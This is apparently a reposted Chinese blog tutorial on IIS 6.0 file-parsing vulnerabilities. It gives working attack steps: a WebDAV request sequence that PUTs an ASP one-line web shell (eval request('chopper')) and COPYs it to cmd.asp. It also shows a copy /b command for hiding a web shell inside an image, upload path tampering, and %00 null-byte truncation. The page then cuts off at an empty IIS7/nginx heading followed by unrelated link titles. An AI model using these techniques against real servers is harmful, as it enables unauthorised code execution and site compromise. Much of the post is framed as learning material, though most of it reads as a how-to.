关于解析漏洞
Posted 52xuege
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了关于解析漏洞相关的知识,希望对你有一定的参考价值。
IIS6.0 解析漏洞
1.在网站目录中如果存在名为*.asp、*asa的目录,那么该目录下内的任何文件都会被解析成asp文件被执行。
2.再上传图片木马的时候,将文件名改为*.asp;,jpg,该文件文件都会被IIS解析为asp文件执行。
3.还有IIS6.0 默认的可执行文件除了asp还包含这三种/wooyun.cer、/wooyun.asa、/wooyun.cdx
4.(转载)WebDav漏洞(对IIS写权限的利用,这个我们在之前学http请求的时候就说过的请求头和正文语句,这段好好看)
- 第一步,通过OPTIONS探测服务器所支持的HTTP方法
请求:
OPTIONS / HTTP/1.1
Host:www.example.com
响应:
Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH
- 第二步,通过PUT方法向服务器上传脚本文件
请求:
PUT /a.txt HTTP/1.1
Host:www.example.com
Content-Length:30
<%eval request("chopper")%>
第三步,通过Move或Copy方法改名
请求:
COPY /a.txt HTTP/1.1
Host:www.example.com
Destination:http://www.example.com/cmd.asp
第四步,使用DELETE方法,攻击者还可以删除服务器上的任意文件
请求:
DELETE /a.txt HTTP/1.1
Host:www.example.com
5.当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:有x.asp文件夹;B:图片木马在x.asp文件夹下,那么怎么去达到这种目的就需要奇艺技巧了,常见的是通过%00截断和一些个更改上传时候的属性。(下面会讲到)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
图片木马制作方法
使用CMD制作一句话木马。
参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件
参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件
copy 1.jpg/b+1.php 2.jpg
//意思是将1.jpg以二进制与1.php合并成2.jpg
那么2.jpg就是图片木马了。
--------------------------------------------------------------------------------------------------
查看数据包,其中Content-Disposition:form-data;name=”path”
下面的一行为服务保存文件的相对路径,我们把原本的 uploadimg/
改为 uploadimg/1.php;
。
---------------------------------------------------------------------------------------------------
截断上传,是借助%00截断上传使%00后面的字串被忽略,如:1.asp.jpg=1.asp%00.jpg,从而成功上传shell。
---------------------------------------------------------------------------------------------------
二、IIS7.0/IIS 7.5/ nginx <8.03畸形解析漏洞
以上是关于关于解析漏洞的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段